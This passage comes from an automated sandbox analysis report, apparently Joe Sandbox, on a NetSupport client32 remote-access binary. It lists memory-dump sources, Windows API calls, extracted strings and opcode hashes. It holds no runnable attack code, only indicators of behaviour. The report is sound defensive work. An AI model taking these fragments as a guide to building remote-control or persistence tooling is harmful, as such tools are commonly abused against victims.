                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Item$FolderMenuPath$BeepEnableFileLongMessageModuleNameObjectPropRectShowSystemTextwsprintf
                                                                                • String ID: %sblockapp.jpg$BlockedAppFile$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 1300213680-78349004
                                                                                • Opcode ID: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                                • Instruction ID: 6f07d7162ed8c172429d77206b5c6f615c65d6256772802cbf9fe3e1e633a07a
                                                                                • Opcode Fuzzy Hash: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                                • Instruction Fuzzy Hash: 0641EE757403197FD720DBA4CC86FDAF3A4AB48B08F104568F3666B5C0DAB0B980CB55
                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 1105F251
                                                                                • wsprintfA.USER32 ref: 1105F265
                                                                                  • Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105F29C,?,00000000,?,00000000,76968400,?,?,1105F29C,80000001), ref: 110ED59B
                                                                                  • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                • wsprintfA.USER32 ref: 1105F5D6
                                                                                  • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf$ExitProcess$CreateEnumErrorLastMessageOpen_strrchr
• String ID: %s\%s$ConfigList$General\ProductId$IsA()$NetSupport School$NetSupport School Pro$Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList$Software\NetSupport Ltd$Software\Productive Computer Insight$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
• API String ID: 273891520-33395967
• Opcode ID: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
• Instruction ID: 955d7069f5cd37ed2049fe2a08fe06563fb7c7f4ee9c814884e1c508eb43a074
• Opcode Fuzzy Hash: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
• Instruction Fuzzy Hash: D2E16079E0122DABDB56DB55CC94FEDB7B8AF58758F4040C8E50977280EA306B84CF61
APIs
• CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 11059C29
• CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 11059C3A
• DeleteObject.GDI32(?), ref: 11059C4B
• PostMessageA.USER32(00040310,00000800,00000000,00000000), ref: 11059CB6
• GetCursorPos.USER32(?), ref: 11059CED
  • Part of subcall function 110585A0: GetTickCount.KERNEL32 ref: 11058616
  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C), ref: 1109599E
  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D), ref: 110959A7
  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E), ref: 110959AE
  • Part of subcall function 11095990: GetSystemMetrics.USER32(00000000), ref: 110959B7
  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F), ref: 110959BD
  • Part of subcall function 11095990: GetSystemMetrics.USER32(00000001), ref: 110959C5
• GetDC.USER32(00000000), ref: 11059CBE
• GetPixel.GDI32(00000000,00000000,00000000), ref: 11059CCB
• SetPixel.GDI32(00000000,00000000,00000000,00000000), ref: 11059CD7
• ReleaseDC.USER32(00000000,00000000), ref: 11059CE0
• GetSystemMetrics.USER32(0000004C), ref: 11059D2B
• GetSystemMetrics.USER32(0000004D), ref: 11059D31
• GetTickCount.KERNEL32 ref: 11059D9D
• _free.LIBCMT ref: 11059E20
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: MetricsSystem$CountPixelTick$CombineCreateCursorDeleteMessageObjectPostRectRelease_free
• String ID:
• API String ID: 4025550384-0
• Opcode ID: 6b09ab56ba7aa2d9871548d0baf0998abdf32238385c40171b047bc0ecf63eb2
• Instruction ID: abc6ed23ccba68bf9f12691c10e6e213c1dc765ac58f2aea97efe2483c19e439
• Opcode Fuzzy Hash: 6b09ab56ba7aa2d9871548d0baf0998abdf32238385c40171b047bc0ecf63eb2
• Instruction Fuzzy Hash: 41A1A271E007099FEBA5DF64C984BEABBF8BF49304F10456DE51A97284EB70A980CF50
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: __wcstoi64
• String ID: Adding Journal Item, type=%d$Client$DisableJournal$Journal prevented duplicate lesson details$NC_JOURNAL jcmd=%d$Start Journal, params=%s$Stop Journal$TraceJournal$_debug$libhpdf.dll
• API String ID: 398114495-2831585317
• Opcode ID: a4eba17e08023296855bf0d54c4ecc45627c38e092dc1e728921e6487a71f37b
• Instruction ID: 035b83a0cb74351545b72c4d140cfb5a1e93af7cf425db96e5df00653b109bf5
• Opcode Fuzzy Hash: a4eba17e08023296855bf0d54c4ecc45627c38e092dc1e728921e6487a71f37b
• Instruction Fuzzy Hash: FFE19578E0420ADFDB05DBA4C8D0FEEB7B5AF49308F248178D8559B784EB75A904CB52
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf
• String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
• API String ID: 2111968516-2092292787
• Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
• Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
• Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
• Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5
APIs
  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
• RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000002,?,00000000,00000000,00000000), ref: 1104DA8B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Value__wcstoi64
• String ID: %s|%s|$Client$DisableReconnect$MacAddress$SOFTWARE\Productive Computer Insight\Client32\AutoReconnect
• API String ID: 2540774538-4016704742
• Opcode ID: bdc685522d1dff83f107ae5c28b6c13ced0ad49426827611b00069c9eafe322b
• Instruction ID: 05e8bff5040e29a5b9abc2ffadfdacbba53fbc28b77198bd54f2eb1c0cd91964
• Opcode Fuzzy Hash: bdc685522d1dff83f107ae5c28b6c13ced0ad49426827611b00069c9eafe322b
• Instruction Fuzzy Hash: 6871A475E00205AFEB14CBA4CC85FEEF7A8EF59318F24456CE519AB680DB71B900CB61
APIs
• GetTickCount.KERNEL32 ref: 110695BD
• EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695D3
• EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695E9
• Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 1106961D
• GetTickCount.KERNEL32 ref: 11069621
• wsprintfA.USER32 ref: 11069651
• LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A4
• LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A7
Strings
• CloseTransports slept for %u ms, xrefs: 11069630
• ..\ctl32\Connect.cpp, xrefs: 11069661
• idata->n_connections=%d, xrefs: 1106964B
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$CountEnterLeaveTick$Sleepwsprintf
• String ID: ..\ctl32\Connect.cpp$CloseTransports slept for %u ms$idata->n_connections=%d
• API String ID: 2285713701-3017572385
• Opcode ID: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
• Instruction ID: 9542bf7036752d1d59350afec772fc21505b61646605733d71942db81f3d6cc8
• Opcode Fuzzy Hash: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
• Instruction Fuzzy Hash: 64317A75E0065AAFD714DFB5C984BD9FBE8FB09708F10462AE529D3A44EB34A900CF94
APIs
  • Part of subcall function 110EE230: LocalAlloc.KERNEL32(00000040,00000014,?,1100D6AF,?), ref: 110EE240
  • Part of subcall function 110EE230: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D6AF,?), ref: 110EE252
  • Part of subcall function 110EE230: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D6AF,?), ref: 110EE264
• CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D6C7
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D6E0
• _strrchr.LIBCMT ref: 1100D6EF
• GetCurrentProcessId.KERNEL32 ref: 1100D6FF
• wsprintfA.USER32 ref: 1100D720
• _memset.LIBCMT ref: 1100D731
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D769
• CloseHandle.KERNEL32(?,00000000), ref: 1100D781
• CloseHandle.KERNEL32(?), ref: 1100D78A
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
• String ID: %sNSSilence.exe %u %u$D
• API String ID: 1760462761-4146734959
• Opcode ID: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
• Instruction ID: dcc8dc743a74700e759132c866a45fb8d4aebb64c19cbf1f793f2e736b28f377
• Opcode Fuzzy Hash: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
• Instruction Fuzzy Hash: BB217675A812286FEB24DBE0CD49FDDB77C9B04704F104195F619A71C0DEB4AA44CF64
APIs
• CreateSolidBrush.GDI32(?), ref: 1100306D
• GetStockObject.GDI32(00000007), ref: 11003089
• SelectObject.GDI32(?,00000000), ref: 1100309A
• SelectObject.GDI32(?,?), ref: 110030A7
• InflateRect.USER32(?,000000FC,000000FF), ref: 110030D8
                                                                                • GetSysColor.USER32(00000004), ref: 110030EB
                                                                                • SetBkColor.GDI32(?,00000000), ref: 110030F6
                                                                                • Rectangle.GDI32(?,?,?,?,?), ref: 11003110
                                                                                • SelectObject.GDI32(?,?), ref: 1100311E
                                                                                • SelectObject.GDI32(?,?), ref: 11003128
                                                                                • DeleteObject.GDI32(?), ref: 1100312E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
                                                                                • String ID:
                                                                                • API String ID: 4121194973-0
                                                                                • Opcode ID: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                • Instruction ID: 33f6d49190b9b24a29b1cc3641f5325a4e922881409c492489886216f2d26618
                                                                                • Opcode Fuzzy Hash: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                • Instruction Fuzzy Hash: 98410AB5A00219AFDB18CFA9D8849AEF7F8FB8C314F104659E96593744DB34A941CBA0
                                                                                APIs
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • std::exception::exception.LIBCMT ref: 1113F7AB
                                                                                • __CxxThrowException@8.LIBCMT ref: 1113F7C0
                                                                                • SetPropA.USER32(?,?,00000000), ref: 1113F84E
                                                                                • GetPropA.USER32(?), ref: 1113F85D
                                                                                • wsprintfA.USER32 ref: 1113F88F
                                                                                • RemovePropA.USER32(?), ref: 1113F8C1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Prop$wsprintf$Exception@8RemoveThrow_malloc_memsetstd::exception::exception
                                                                                • String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                • API String ID: 2013984029-1590351400
                                                                                • Opcode ID: e646804ecc7ddf954b9f726e774aae96fceda95ccf96e222f81c043a3edeb97b
                                                                                • Instruction ID: 9c375b31db466058645a4841bcb89a7be01c9296122d1f1adc6750c52d58ca69
                                                                                • Opcode Fuzzy Hash: e646804ecc7ddf954b9f726e774aae96fceda95ccf96e222f81c043a3edeb97b
                                                                                • Instruction Fuzzy Hash: 9071EC76B002299FD714CFA9DD80FAEF7B8FB88315F00416FE54697244DA71A944CBA1
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
